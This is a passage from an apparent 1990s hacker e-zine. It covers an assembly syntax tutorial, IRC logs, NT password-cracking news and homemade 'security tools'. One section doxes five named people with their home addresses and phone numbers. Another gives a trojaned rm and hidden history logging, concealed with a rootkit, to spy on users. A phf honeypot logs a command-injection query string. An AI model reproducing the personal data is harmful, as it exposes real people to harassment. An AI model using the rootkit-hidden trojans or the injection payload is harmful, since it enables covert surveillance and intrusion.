front of mov, is the byte/memory operand..... this is actually more convient if you ask me. also in intel......you have section:[base + index*scale + disp] disp=displcement scale=1 if not given in att however, it's like this: section:disp(base,index,scale) so es:[ebp-5] in intel would be %es:-4(%ebp) in att Intel: [foo] AT&T: foo(,1) the ,1 means an index of one... Inte: [foor + eax*4] AT&T: foor(,%eax,4) I hope this helps :) How to Get some assembly examples in unix: ----------------------------------------- Now how to get a few examples on how to get some assembly code for unix......first of all you can do something like this: test.c: void main() { printf("hi\n"); } now to compile it, do gcc -S test.c, this will make a file test.s in assembly......look at it it contains great info....and some examples of the macros and what not defined/shown in gas' (GNU assembler) manual. (Which can be found at http://www.cs.utah.edu/csinfo/texinfo, under gas. here is what test.s will look like: .file "test.c" .version "01.01" gcc2_compiled.: .section .rodata .LC0: .string "test\n" .text .align 4 .globl main .type main,@function main: pushl %ebp movl %esp,%ebp pushl $.LC0 call printf addl $4,%esp .L1: leave ret .Lfe1: .size main,.Lfe1-main .ident "GCC: (GNU) 2.7.2.1" As you know, the "l"'s in front of push,mov,add, etc....that means it's type long.... and the % goes in front of all register operands, whereas in intel syntax, it is undelimited. Likewise, the immediate operands, have a $ in front of them, whereas once again, intel is undelimited. movl $3, %eax is equal to: mov eax, 3 in intel The other way to get asm code is with gdb......you compile your program with gcc -g .......and for even more......gcc -g -a... here is our test.c ......in gdb, we do 'disassemble main': (gdb) disassemble main Dump of assembler code for function main: 0x8048474 <main>: pushl %ebp 0x8048475 <main+1>: movl %esp,%ebp 0x8048477 <main+3>: pushl $0x80484c8 0x804847c <main+8>: call 0x8048378 <printf> 0x8048481 <main+13>: addl $0x4,%esp 0x8048484 <main+16>: leave 0x8048485 <main+17>: ret End of assembler dump. That is with just -g.......with -a as well you can see the difference (more instructions show up that usually wouldn't): (gdb) disassemble main Dump of assembler code for function main: 0x80485d8 <main>: pushl %ebp 0x80485d9 <main+1>: movl %esp,%ebp 0x80485db <main+3>: cmpl $0x0,0x8049a6c 0x80485e2 <main+10>: jne 0x80485f1 <main+25> 0x80485e4 <main+12>: pushl $0x8049a6c 0x80485e9 <main+17>: call 0x80488fc <__bb_init_func> 0x80485ee <main+22>: addl $0x4,%esp 0x80485f1 <main+25>: incl 0x8049b78 0x80485f7 <main+31>: pushl $0x8048978 0x80485fc <main+36>: call 0x8048468 <printf> 0x8048601 <main+41>: addl $0x4,%esp 0x8048604 <main+44>: incl 0x8049b7c 0x804860a <main+50>: leave 0x804860b <main+51>: ret End of assembler dump. I of course need to give credit of this to the gas manual, as parts were taken from there. Well I hope you enjoyed that little introduction. Any corrections let me know as shok@onlinex.net or shok@janova.org. Shok (--==+*~Shok~*+==--) ─────────────────────────────────────────────────────────────────────────────── 2. sIn inf0z : so1o ─────────────────────────────────────────────────────────────────────────────── Fucking sIn b1tchez bow to the elite. ─────────────────────────────────────────────────────────────────────────────── Alias : Evil Chick Real Name : Suzette Kimminau Address : 130 105th Ave. S.E. Apt. 218 Bellevue, Wa 98004 USA Telephone : (206)454-7176 E-mail : evilchic@NWLINK.COM ------------------------------------------------------------------------------- Alias : \\StOrM\\ Real Name : Jason Sloderbeck Address : 5739 N Norton, Kansas City, MO 64119 USA Telephone : (816)453-8722 E-mail : storm@SINNERZ.COM ------------------------------------------------------------------------------- Alias : JDKane Real Name : Kim Address : 327 E Park Road, Round Lake, IL 60073 USA Telephone : (847)546-9154 E-mail : ------------------------------------------------------------------------------- Alias : Soul Tear Real Name : Wesley Stroeber Address : 10770 E. Silver Vein Dr. Tucson, Arizona 85710 USA Telephone : E-mail : soultear@mindspring.com ------------------------------------------------------------------------------- Alias : Scud-O Real Name : Kevin Shivers Address : PO Box 448 Sykesville, Maryland 21784 USA Telephone : (410)442-2410 E-mail : foxmulder@WORLDNET.ATT.NET ─────────────────────────────────────────────────────────────────────────────── You want to know how lame sIn really are? check www.sinnerz.com The Hax0r brothers don't 0wn a car between them. ─────────────────────────────────────────────────────────────────────────────── 3. Wassup with NT?! : Crystalize ─────────────────────────────────────────────────────────────────────────────── You know... take a lok around you next time you happen to be at the news sites of places like underground.org, and l0pht.com. What is it you're seeing all around you? Shit about NT, thats what. Windows NT is claimed to have critical system holes in it that would allow a hakcer complete access to any Nt system on the net. You might ask yourself what Microsoft is doing in reponse to the what these computer security consultants (hackers with a salary) have said. Absolutely nothing! Thats right! You heard it first from Crystalize. Well, maybe not first, but by God I told it anyway. But, back to the story. Microsoft was told of these security flaws in the NT system and went straight to work to correct these little problems. Of course, the plugs for these hoes, however, will not be coming out until the NT 5.0 upgrade sometime around 1998! Hackers are going to have a big field day with NT. Although I've spent the first of this article totally trashing Microsoft for not taking immediate action by coming out with a patch for NT, you do have to give them a little credit. They actually swallowed their pride and came asking for help. Who do you think they asked? Thats right, Microsoft came crawling to the community of hackers. It goes against every policy that Microsoft has, but, what the hell, lets face it... they needed some help. Anyway, they came to L0pht and asked for help. Why did they come to l0pht? Because it was L0phtcrack 1.5 that decrypted NT user passwords and sent them back in plain text (pretty slick, l0pht.) Okay, about this meeting. Microsoft sends these NT experts to talk with security experts from the government and the hacking community. I'm going to quote someone real quick. NT marketing director Carl Karanan said this,"We came here to look at the hacker's perspective - to understand what they're thinking and what their concerns are. Its good to look at things in perspective; this conference does that." He also said something kinda nice, "We've opened up a dialogue. The hackers do a service. We're listening and learning." No shit, he really said that... a Microsoft exec saying they're learning from the hackers. Ok, heres another quote, only this one's from a hacker. "What we're trying to do as a community is point out some very serious problems in an operating system that is used in corporate America and in goverments worldwide, and we're pointing it out in a legitmate manner saying 'Fix This.'", said Yobie Benjamin, a knowledge officer and NT hacker. Then Mudge got up to speak and gave a little presentation about L0phts new NT password cracking program. An impressive audience to, which I hear included execs from Toyota, ESPN, the Defense Department and the NSA. (WAY TO GO MUDGE!) Anyway, if you want to know exactly what the program does, head to L0phts site at www.l0pht.com/advisories. And you know what? This program I'm told is extremely powerful. Here's a little taste of what it does. Mudge says that if the program is launched from a Unix or Pentium Pro 200 on a corporation of 40,000 users that managed all usernames and Lanman/NT passwords from one PDC (primary domain controller), it would only take 40 hours to decrypt all 40,000 passwords and give them to ya in plain text. (DAMN!) I really like this quote from Mudge, too, "Windows NT's backward compatability always bite 'em on the ass." HAHAHAHAHA! Anyway, thats all I've got to report on that little bit of news. Thanks for readin and let me know if ya want me to report on any other stuff. Later. - Crystalize @#w|h|p|v on EFNet ─────────────────────────────────────────────────────────────────────────────── 4. More #hebrew : so1o ─────────────────────────────────────────────────────────────────────────────── *** \\`a\\` (jack@ts1p2.rannet.com) has joined #hebrew <\\`a\\`> shit!! <RoBoGi> [\\`a\\`] The M@$TER IS HeRe !!!! BE CAREFUL!!! <\\`a\\`> som1 nuked me!!! *** \\`a\\` is now known as {Jupiter} *** ^MAD^SAD^ has quit IRC (Broken pipe) <{Jupiter}> mega!! <{Jupiter}> how can one nuke me ..!!! <{Jupiter}> meeeeeeeeeegggggggaaaaaaa <MeGaMaN-> GREAT!!!!!!1 <MeGaMaN-> lens flare RULEEEEZZZZZ <{Jupiter}> what greaT!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! <{Jupiter}> som1 nuke me!! <{Jupiter}> and , i restared my pc!! <{Jupiter}> mega!! <{Jupiter}> r u therE?!?!? <{Jupiter}> man!! <{Jupiter}> meeeeeeeeeeeeggggggggggggggggggggggggggaaaaaaaaaaaaaa <MeGaMaN-> YES <MeGaMaN-> yes <MeGaMaN-> i was in photoshop <{Jupiter}> where r u ? <MeGaMaN-> i was in photoshop4 <{Jupiter}> ok.. <{Jupiter}> so , tell me <{Jupiter}> how did 1 nuke me?! <MeGaMaN-> what hapend? <{Jupiter}> so1 nuke me <MeGaMaN-> ur computer FREEZED? <{Jupiter}> noooooooo <{Jupiter}> the comp. was blue <MeGaMaN-> so install the winnuke fix!! <{Jupiter}> winnuke fix?! <MeGaMaN-> yes <{Jupiter}> i mean , so1 nuke me , and bomb <{Jupiter}> i am not in wi95 <{Jupiter}> bom <{Jupiter}> i am in a blue!!! <{Jupiter}> worming!! <MeGaMaN-> [{Jupiter} VERSION reply]: mIRC32 v5.0 K.Mardam-Bey <MeGaMaN-> u r on win95 <{Jupiter}> yep! <MeGaMaN-> my fix is already installed <MeGaMaN-> and i dont have him <MeGaMaN-> it <{Jupiter}> ok.. <{Jupiter}> where r all the boTS?! ─────────────────────────────────────────────────────────────────────────────── 5. Linking to /dev/zero : xFli ─────────────────────────────────────────────────────────────────────────────── [Tremle_(tremle@163.164.162.19)] cna I have the exploit mate, please [msg(tremle_)] not yetr!$#!@$ [Tremle_(tremle@163.164.162.19)] why mate? [Tremle_(tremle@163.164.162.19)] pleeease [Tremle_(tremle@163.164.162.19)] mate, please sendmial 8.8.5 remote [Tremle_(tremle@163.164.162.19)] and I won;t ask for anything ever again >>> Tremle_ [tremle@163.164.162.19] requested PING from xFli [msg(tremle_)] .... [Tremle_(tremle@163.164.162.19)] just this one time <xFli> hoho, i think the ol ln -s /dev/zero 885.remote.c trick could be useful here ∙φ∙ DCC SEND connection with tremle_[163.164.162.19, port 1061] established <xFli> ∙φ∙ DCC SEND connection with tremle_[163.164.162.19, port 1061] established [Tremle_(tremle@163.164.162.19)] is it remote? [msg(tremle_)] YES [Tremle_(tremle@163.164.162.19)] thansk mate [msg(tremle_)] U better not bug me like this again [Tremle_(tremle@163.164.162.19)] root shell? ;) [Tremle_(tremle@163.164.162.19)] i won't [Tremle_(tremle@163.164.162.19)] is it moving? [msg(tremle)] so are u gonna give me something in return then? [Tremle_(tremle@163.164.162.19)] :) [Tremle_(tremle@163.164.162.19)] thankyou very much I relly appreciate [Tremle_(tremle@163.164.162.19)] ok cary on with yer scripting [msg(tremle_)] so are u gonna give me something in return then? [Tremle_(tremle@163.164.162.19)] what you want? [msg(tremle_)] something cool [Tremle_(tremle@163.164.162.19)] how big is this btw? [Tremle_(tremle@163.164.162.19)] uhm [msg(tremle_)] its quite big, got a lot of shellcode in it, its actually quite a compliated sploit [Tremle_(tremle@163.164.162.19)] what sorta thing you lookign for [msg(tremle_)] just, well, anything [Tremle_(tremle@163.164.162.19)] uhm [msg(tremle_)] u got anything new? [Tremle_(tremle@163.164.162.19)] I will hoepfully get soem on thursday [Tremle_(tremle@163.164.162.19)] SunOS stuff [msg(tremle_)] can't u gimme somethin now? [Tremle_(tremle@163.164.162.19)] i shall have a look [Tremle_(tremle@163.164.162.19)] tremle find's frantically [msg(tremle_)] just anything cool... [msg(tremle_)] u got any new bsd stuff? [Tremle_(tremle@163.164.162.19)] I shall look [Tremle_(tremle@163.164.162.19)] do they have to be remote? [msg(tremle_)] naw, jus anything... [Tremle_(tremle@163.164.162.19)] nope [Tremle_(tremle@163.164.162.19)] this is taking a while, what size is it? [msg(tremle_)] its about 400k Tremle_(tremle@163.164.162.19)] k [msg(tremle_)] ok, well, send me just well, do you have anything like eipscan 2? [Tremle_(tremle@163.164.162.19)] nope [Tremle_(tremle@163.164.162.19)] uhm [Tremle_(tremle@163.164.162.19)] so what would you prefer? [msg(tremle_)] hmm...what bsd stuff do you have? [Tremle_(tremle@163.164.162.19)] exploits.code or what? [msg(tremle)] exploits... [msg(tremle)] or some cool codez [Tremle_(tremle@163.164.162.19)] rxvt exploit [Tremle_(tremle@163.164.162.19)] rdist [msg(tremle_)] rxvt for bsd? [msg(tremle_)] send that [Tremle_(tremle@163.164.162.19)] ok [Tremle_(tremle@163.164.162.19)] wiat a sec [Tremle_(tremle@163.164.162.19)] hmm, also slackware 3.0 [msg(tremle_)] just bsd [msg(tremle_)] send bsd ∙φ∙ DCC SEND (rxvt.txt) request from Tremle_[tremle@163.164.162.19 [163.164.162.19:1097]] ∙φ∙ Auto-getting file rxvt.txt from Tremle_ ∙φ∙ DCC GET connection with Tremle_[163.164.162.19, port 1097] established ∙φ∙ DCC GET:rxvt.txt [2.269kb] from Tremle_ completed in 7 secs (0.3241 kb/sec) [msg(tremle_)] any other bsd stuff? [Tremle_(tremle@163.164.162.19)] if it's old tell me [Tremle_(tremle@163.164.162.19)] I have everything mixed up [msg(tremle_)] whats the newest stuff you have? [Tremle_(tremle@163.164.162.19)] wait a sec [Tremle_(tremle@163.164.162.19)] procfs [msg(tremle_)] i have that [Tremle_(tremle@163.164.162.19)] screen [msg(tremle_)] send that [Tremle_(tremle@163.164.162.19)] ddb msg(tremle_)] send that too [Tremle_(tremle@163.164.162.19)] both? [Tremle_(tremle@163.164.162.19)] wait a sec [Tremle_(tremle@163.164.162.19)] dcc send xFLi [Tremle_(tremle@163.164.162.19)] doh [Tremle_(tremle@163.164.162.19)] I have put them in .html format, they were goan go on my webpage [msg(tremle_)] s'ok, send em anywayz.. ∙φ∙ DCC SEND (ddbsd.html) request from Tremle_[tremle@163.164.162.19 [163.164.162.19:1106]] ∙φ∙ Auto-getting file ddbsd.html from Tremle_ ∙φ∙ DCC GET connection with Tremle_[163.164.162.19, port 1106] established ∙φ∙ DCC GET:ddbsd.html [2.608kb] from Tremle_ completed in 17 secs (0.1534 kb/sec) [Tremle_(tremle@163.164.162.19)] how big is this? [msg(tremle_)] should be nearly finished [Tremle_(tremle@163.164.162.19)] k, what size is it? [Tremle_(tremle@163.164.162.19)] how's the sploti work? [msg(tremle_)] i thought it was like 400k but thatwas sommin else, its about 950k i think [Tremle_(tremle@163.164.162.19)] mm [Tremle_(tremle@163.164.162.19)] sure you just haven;t renamed a file 885rem.c ? [msg(tremle_)] like i said, its pretty complicated <xFli> [Tremle_(tremle@163.164.162.19)] sure you just haven;t renamed a file 885rem.c <xFli> ? <xFli> OH! hes nearly caught on! [Tremle_(tremle@163.164.162.19)] k [Tremle_(tremle@163.164.162.19)] I;ll take yer word for it [Tremle_(tremle@163.164.162.19)] what else you got btw? [Tremle_(tremle@163.164.162.19)] can you check the filesize completelley? [msg(tremle)] 2 secs [Tremle_(tremle@163.164.162.19)] I mena will you check it? >>> Tremle_ [tremle@163.164.162.19] requested PING from xFli [Tremle_(tremle@163.164.162.19)] fuck [msg(tremle_)] -r-------- 1 root root 933744 Aug 4 12:16 885rem.c [Tremle_(tremle@163.164.162.19)] infiniete dcc [Tremle_(tremle@163.164.162.19)] ? [msg(tremle_)] 933 k [Tremle_(tremle@163.164.162.19)] you did an infinite dcc? [msg(tremle_)] no way dammit [Tremle_(tremle@163.164.162.19)] serious have you? [msg(tremle_)] serious. NO [Tremle_(tremle@163.164.162.19)] ok [Tremle_(tremle@163.164.162.19)] so1o thinks you have [msg(tremle_)] wtf would so1o know? [msg(tremle_)] i can't stand that g1mp [Tremle_(tremle@163.164.162.19)] hmm [Tremle_(tremle@163.164.162.19)] so what size is it again? [msg(tremle_)] 933k [Tremle_(tremle@163.164.162.19)] k [Tremle_(tremle@163.164.162.19)] never seen an exploit this big before >>> Tremle_ [tremle@163.164.162.19] requested PING from xFli [Tremle_(tremle@163.164.162.19)] my spellign sukcs, im such a homo... [Tremle_(tremle@163.164.162.19)] so1o is so cool [Tremle_(tremle@163.164.162.19)] i smell [Tremle_(tremle@163.164.162.19)] hey, you;re a fucking lair and sutff ∙φ∙ DCC lost SEND to tremle_ [/home/security/885rem.c] ─────────────────────────────────────────────────────────────────────────────── =============================================================================== ==[ NEWS ]=====================[ .SECTION E. ]=======================[ NEWS ]== =============================================================================== ─────────────────────────────────────────────────────────────────────────────── Like, nothing happened and stuff.. .so1o ─────────────────────────────────────────────────────────────────────────────── =============================================================================== ==[ PROJECTS ]=================[ .SECTION F. ]===================[ PROJECTS ]== =============================================================================== ─────────────────────────────────────────────────────────────────────────────── 1. TOTALCON '98 : so1o ─────────────────────────────────────────────────────────────────────────────── ****************************************************************************** http://www.aom.co.uk/total/ ****************************************************************************** +------------------------------------+------------------------------------+ ▌ An Official Total Con Announcement ▌ An Official Total Con Announcement ▌ ▌ An Official Total Con Announcement ▌ An Official Total Con Announcement ▌ +------------------------------------+------------------------------------+ ****************************************************************************** http://www.aom.co.uk/total/ ****************************************************************************** Total Con '98 is now a reality, here are preliminary details... =============================================================== Venue : The Old Firestation, Silver Street, Bristol, ENGLAND Date : Late March 1998 (probably the last week) Duration : 1 night (12:00pm -> 12:00pm next day) What : 12 system network with internet access Loud music Fully licensed bar downstairs Elite UV and spotlights Channel 4 media coverage (hopefully) ALOT of cool people ^^^^^^^^^^^^^^^^^^^ *** NO SPEAKERS WHATSOEVER *** *** NO SPEAKERS WHATSOEVER *** Travel : Easily accessible by car, train, bus or plane. Accomodation : You can crash out in the Firestation (its HUGE) or book one of many hotels in the immediate area. ****************************************************************************** http://www.aom.co.uk/total/ ****************************************************************************** +------------------------------------+------------------------------------+ ▌ An Official Total Con Announcement ▌ An Official Total Con Announcement ▌ ▌ An Official Total Con Announcement ▌ An Official Total Con Announcement ▌ +------------------------------------+------------------------------------+ ****************************************************************************** http://www.aom.co.uk/total/ ****************************************************************************** ─────────────────────────────────────────────────────────────────────────────── 2. Security / Monitoring tools : Shok ─────────────────────────────────────────────────────────────────────────────── SECURITY/MONITORING (some misc. tools I wrote) --------------------------------------------- By (--==+*~Shok~*+==--) Okay, well........welcome to this thing......by Shok. What I plan for this to be, is some various utilities that you might think as of use and what not. This is mainly a few security tips that I like to use. First off, edit your /etc/profile, and add the line: export HISTFILE=/tmp/hist/`whoami` and then do: mkdir /tmp/hist;chmud 1777 /tmp/hist You now want to hide that file, so the users don't see the dir (it can be seen with set but not too many people check :) and you hide it with the rootkit's ls. Another few things I like to do. I made a trojaned 'rm' that basically calls /bin/rm.bak which is hidden (via rootkit ls), and it copies the file they are trying to delete to /tmp/fill (which is also hidden via rootkit ls). There are two versions of this....I wrote the first one in shell script, but do to the fact it has to be a+r, I wrote it in C afterwords. Here is the rm.sh: #!/bin/sh # rm.sh -- rm "trojan" by (--==+*~Shok~*+==--) if [ $# > 1 ] then case $1 in -i) shift cp -f $* /tmp/fill &>/dev/null doexec /bin/rm.bak rm -i $* ;; --interactive) shift cp -f $* /tmp/fill &>/dev/null doexec /bin/rm.bak rm -i $* ;; -f) shift cp -f $* /tmp/fill &>/dev/null /bin/rm.bak -f $* ;; --force) shift cp -f $* /tmp/fill &>/dev/null /bin/rm.bak -f $* ;; -d) shift cp $1/* /tmp/fill &>/dev/null /bin/rm.bak -d $* ;; --directory) shift cp $1/* /tmp/fill &>/dev/null /bin/rm.bak -d $* ;; -v) shift cp -f $* /tmp/fill &>/dev/null /bin/rm.bak -v $* ;; --verbose) shift cp -f $* /tmp/fill &>/dev/null /bin/rm.bak -v $* ;; -r) shift cp -f $1/* /tmp/fill &>/dev/null /bin/rm.bak -R $* ;; -R) shift cp -f $1/* /tmp/fill &>/dev/null /bin/rm.bak -R $* ;; --recursive) shift cp -f $1/* /tmp/fill &>/dev/null /bin/rm.bak -R $* ;; -ri) shift cp -f $1/* /tmp/fill &>/dev/null /bin/rm.bak -ri $* ;; -Ri) shift cp -f $1/* /tmp/fill &>/dev/null /bin/rm.bak -ri $* ;; -rf) shift cp -f $1/* /tmp/fill &>/dev/null cp -f $1 /tmp/fill &>/dev/null /bin/rm.bak -rf $* ;; -Rf) shift cp -f $1/* /tmp/fill &>/dev/null cp -f $1 /tmp/fill &>/dev/null /bin/rm.bak -rf $* ;; -rd) shift cp -f $1/* /tmp/fill &>/dev/null /bin/rm.bak -rd $* ;; -Rd) shift cp -f $1/* /tmp/fill &>/dev/null /bin/rm.bak -rd $* ;; -Rv) shift cp -f $1/* /tmp/fill &>/dev/null /bin/rm.bak -rv $* ;; -rv) shift cp -f $1/* /tmp/fill &>/dev/null /bin/rm.bak -rv $* ;; -fv) shift cp -f $1 /tmp/fill &>/dev/null /bin/rm.bak -fv $* ;; -Rfv) shift cp -f $1/* /tmp/fill &>/dev/null cp -f $1 /tmp/fill &>/dev/null /bin/rm.bak -rfv $* ;; -rfv) shift cp -f $1/* /tmp/fill &>/dev/null cp -f $1 /tmp/fill &>/dev/null /bin/rm.bak -rfv $* ;; *) cp -f $* /tmp/fill &>/dev/null /bin/rm.bak $* ;; esac else IT=$1 cp -f $IT /tmp/fill /bin/rm.bak $IT fi #---------------------------------------------------- You may have to change the line: doexec /bin/rm.bak -i $* to: /bin/rm.bak -i $* if you do not have doexec which is on linux (or redhat anyway) Now for rm.c: /* ------------------------------------------------------ */ /* rm.c -- rm "trojan" by (--==+*~Shok~*+==--) */ /* ------------------------------------------------------ */ #include <sys/stat.h> #include <string.h> #include <stdio.h> #include <stdlib.h> #include <unistd.h> void main(int argc, char **argv) { struct stat filestats; int i; if (argc > 2) { if (strcmp("-i", argv[1])==0) goto interactive; if (strcmp("-f", argv[1])==0) goto force; if (strcmp("-v", argv[1])==0) goto verbose; if (strcmp("-r", argv[1])==0) goto recursive; if (strcmp("-rf", argv[1])==0) goto rf; if (strcmp("-ri", argv[1])==0) goto ri; if (strcmp("-rv", argv[1])==0) goto rv; if (strcmp("-rvf", argv[1])==0) goto rfv; if (strcmp("-rfv", argv[1])==0) goto rfv; if (strcmp("-Rvf", argv[1])==0) goto rfv; if (strcmp("-Rfv", argv[1])==0) goto rfv; if (strcmp("-frv", argv[1])==0) goto rfv; if (strcmp("-fvr", argv[1])==0) goto rfv; if (strcmp("-fRv", argv[1])==0) goto rfv; if (strcmp("-fvR", argv[1])==0) goto rfv; if (strcmp("-vfr", argv[1])==0) goto rfv; if (strcmp("-vrf", argv[1])==0) goto rfv; if (strcmp("-vfR", argv[1])==0) goto rfv; if (strcmp("-vRf", argv[1])==0) goto rfv; if (strcmp("-fr", argv[1])==0) goto rf; if (strcmp("-ir", argv[1])==0) goto ri; if (strcmp("-vr", argv[1])==0) goto rv; if (strcmp("--interactive", argv[1])==0) goto interactive; if (strcmp("--force", argv[1])==0) goto force; if (strcmp("--verbose", argv[1])==0) goto verbose; if (strcmp("--recursive", argv[1])==0) goto recursive; } else { setenv("PROGRAM", argv[1], 1); system("cp -f $PROGRAM /tmp/fill &>/dev/null"); system("/bin/rm.bak $PROGRAM"); unsetenv("PROGRAM"); } interactive: lstat(argv[2], &filestats); for (i=2;i<argc;i++) { if (S_ISDIR(filestats.st_mode)) { setenv("PROGRAM", argv[i], 2); system("cp -f $PROGRAM/* /tmp/fill &>/dev/null"); unsetenv("PROGRAM"); execl("/bin/rm.bak","rm","-i",argv[2],NULL); } else { setenv("PROGRAM", argv[2], 1); system("cp -f $PROGRAM /tmp/fill &>/dev/null"); unsetenv("PROGRAM"); execl("/bin/rm.bak","rm","-i",argv[2],NULL); } } force: for (i=2;i<argc;i++) { setenv("PROGRAM", argv[i], 1); system("cp -f $PROGRAM /tmp/fill &>/dev/null"); execl("/bin/rm.bak","rm","-f",argv[i],NULL); unsetenv("PROGRAM"); } verbose: for (i=2;i<argc;i++) { setenv("PROGRAM", argv[i], 1); system("cp -f $PROGRAM /tmp/fill &>/dev/null"); execl("/bin/rm.bak","rm","-v",argv[i],NULL); unsetenv("PROGRAM"); } recursive: for (i=2;i<argc;i++) { setenv("PROGRAM", argv[i], 1); system("cp -f $PROGRAM /tmp/fill &>/dev/null"); execl("/bin/rm.bak","rm","-r",argv[i],NULL); unsetenv("PROGRAM"); } rf: for (i=2;i<argc;i++) { lstat(argv[i], &filestats); if (S_ISDIR(filestats.st_mode)) { setenv("PROGRAM", argv[i], 1); system("cp -f $PROGRAM/* /tmp/fill &>/dev/null"); unsetenv("PROGRAM"); execl("/bin/rm.bak","rm","-rf",argv[i],NULL); } else { setenv("PROGRAM", argv[i], 1); system("cp -f $PROGRAM /tmp/fill &>/dev/null"); unsetenv("PROGRAM"); execl("/bin/rm.bak","rm","-rf",argv[i],NULL); } } ri: for (i=2;i<argc;i++) { setenv("PROGRAM", argv[i], 1); system("cp -f $PROGRAM /tmp/fill &>/dev/null"); execl("/bin/rm.bak","rm","-ri",argv[i],NULL); unsetenv("PROGRAM"); } rv: for (i=2;i<argc;i++) { setenv("PROGRAM", argv[i], 1); system("cp -f $PROGRAM /tmp/fill &>/dev/null"); execl("/bin/rm.bak","rm","-rv",argv[i],NULL); unsetenv("PROGRAM"); } rfv: for (i=2;i<argc;i++) { setenv("PROGRAM", argv[i], 1); system("cp -f $PROGRAM /tmp/fill &>/dev/null"); execl("/bin/rm.bak","rm","-rfv",argv[i],NULL); unsetenv("PROGRAM"); } } This program can of course be improved, especially replacing the strcmp's with getopt() but I could care less.... Now when ever a user deletes something it will first be copied to /tmp/fill before it's deleted. Now, even though it's logged to /var/log/httpd/access_log, I'd like to know right away when someone tries to use the phf or test-cgi vulnerabilities on me. So I replaced the phf and test-cgi programs in my /cgi-bin/ with this. The first will get the info on who it is, then it will send a fake passwd file. This can be improved of course but I don't care to take the time. phf.c: /* ----------------------------------------------------- */ /* phf "trojan" by (--==+*~Shok~*+==--) */ /* ----------------------------------------------------- */ #include <stdio.h> #include <unistd.h> #include <stdlib.h> void main() { FILE *tmpfile, *fingerinfo; char *host, *addr, *browser, *query_string; char fingerbuf[2048]; host=getenv("REMOTE_HOST"); addr=getenv("REMOTE_ADDR"); browser=getenv("HTTP_USER_AGENT"); query_string=getenv("QUERY_STRING"); /* This is to prevent a finger war, the ip address below is my ip address */ /* just to be on the safe side. But I do have in.fingerd: LOCAL to allow */ /* me to finger without starting a finger war. */ if ((strcmp(addr, "206.71.69.243")) || (strcmp(addr,"127.0.0.1")) == 0) exit(0); system("finger @$REMOTE_ADDR > /var/tmp/.fingerinfo1"); tmpfile=fopen("/var/tmp/.phf", "w"); fingerinfo=fopen("/var/tmp/.fingerinfo1", "r"); fprintf(tmpfile, "The following person used phf!!\n\n"); fprintf(tmpfile, "\tHost: %s\n", host); fprintf(tmpfile, "\tAddress: %s\n", addr); fprintf(tmpfile, "\tBrowser type: %s\n", browser); fprintf(tmpfile, "\tQuery String (aka command entered): %s\n\n", query_string); fingerinfo=fopen("/var/tmp/.fingerinfo1", "r"); fgets(fingerbuf, 2047, fingerinfo); fclose(fingerinfo); fprintf(tmpfile, "I did a finger of the person trying to exploit us:\n"); fprintf(tmpfile, "--------------------------------------------------\n"); fputs(fingerbuf, tmpfile); fclose(tmpfile); system("mail -s \"SOMEONE USED phf!!\" root </var/tmp/.phf"); unlink("/var/tmp/.fingerinfo1"); unlink("/var/tmp/.phf"); printf("Content-type: text/html\n\n"); printf("<H1>Query Results</H1>\n"); printf("<P>\n"); printf("/usr/local/bin/ph -m alias=x \n"); printf("cat /etc/passwd\n"); printf("<PRE>\n"); printf("root:TQoabYuFUSoSk:0:1:Operator:/:/bin/csh\n"); printf("nobody:*:65534:65534::/:\n"); printf("daemon:*:1:1::/:\n"); printf("sys:*:2:2::/:/bin/csh\n"); printf("bin:*:3:3::/bin:\n"); printf("uucp:*:4:8::/var/spool/uucppublic:\n"); printf("news:*:6:6::/var/spool/news:/bin/csh\n"); printf("ingres:*:7:7::/usr/ingres:/bin/csh\n"); printf("mail:*:8:12::/:\n"); printf("johnny:Abx4dgSg:MaTr|x:/home/MaTrix:/bin/sh\n"); printf("audit:*:9:9::/etc/security/audit:/bin/csh\n"); printf("sync::1:1::/:/bin/sync\n"); printf("kill8r:AfBs45Syf:100:25:Siko:/home/Siko:/bin/sh\n"); printf("ppp::70:70:PPP login:/tmp:/etc/ppplogin\n"); printf("sysdiag:*:0:1:Old System Diagnostic:/usr/diag/sysdiag:/usr/diag/sysdiag/sysdiag\n"); printf("sundiag:*:0:1:System Diagnostic:/usr/diag/sundiag:/usr/diag/sundiag/sundiag\n"); printf("ftp:*:10:20:ftp:/home/ftp:/usr/bin/bash\n"); printf("luseruser:xAFjgodjFa4:254:100:Pr0t0:/home/Pr0t0c0l:/bin/sh\n"); printf("babum:aDtg3Gs645:BiT-#hacker:454:100:/home/BiT:/bin/sh\n"); printf("www:*:30:30:World Wide Web:/home/www:/usr/bin/bash\n"); printf("pop:*:70:70:Post Office Protocol:/var/spool/pop:/usr/bin/bash\n"); printf("zirzlaff:.a6RPNtUhGW0k:3190:100:Torsten Zirzlaff:/home/tz:/usr/local/bin/tcsh\n"); printf("f33r:A23gAdcYf5:4110:100:f33r me bitch:/home/hph:/usr/local/bin/tcsh\n"); printf("henrik:v50YvKjFwWw.M:4120:18:HeNriK:/usr/sirius/henrik:/usr/bin/bash\n"); printf("inas:fStcY3^gf:8900:100:InaSaLoser:/home/is:/usr/local/bin/tcsh\n"); printf("ivo:*:8920:100:Da Tru hacker-Lamer:/home/ivo:/usr/local/bin/tcsh\n"); printf("pcguest::7454:100:Temp hax0r account:/tmp:/usr/bin/sh\n"); printf("simone:Em8y0pwT.5umo:8930:100:Simone Kleine:/home/simone:/usr/bin/bash\n"); printf("shko:aDrsBsefYr:666:100:SHLRP:/home/shok:/bin/bash\n"); printf("majordomo:*:405:20:Majordomo server:/dev/null:/bin/startdomo\n"); printf("listserv:*:567:20:Listserv server:/dev/null:/bin/sh\n"); printf("hammer:FwhX26Hf1:8940:100:Peter Hammerstein:/home/hammer:/usr/bin/bash\n"); printf("patrick:cYz7MXTIyGByQ:8950:100:Patrick Mergell:/home/patrick:/usr/bin/bash\n"); printf("chr:T/SRcchg0fK3I:8960:100:Christian Zemlin:/home/chr:/usr/bin/bash\n"); printf("db:*:8970:100:Dieter Beule:/usr/sirius/dieter:/usr/bin/bash\n"); printf("guest:AefxF2a2D:8999:110:Guest:/home/guest:/usr/local/bin/tcsh\n"); printf("</PRE>"); } This is what the above will show up in the root's mail: The following person used phf!! Host: ts037d12.chi-il.concentric.net Address: 206.173.188.168 User (if able): (null) Ident (if able): (null) Browser type: (null) Query String (aka command entered): Qalias=X%0aid I did a finger of the person trying to exploit us: -------------------------------------------------- [206.173.188.168] (probably Win95 which is why there was no output as Win95 doesn't have an actual "finger" program) Now for the test-cgi...this does the same thing accept it will send a "File Not found" instead: test-cgi.c: /* --------------------------------------------------- */ /* test-cgi.c -- test-cgi "trojan" by 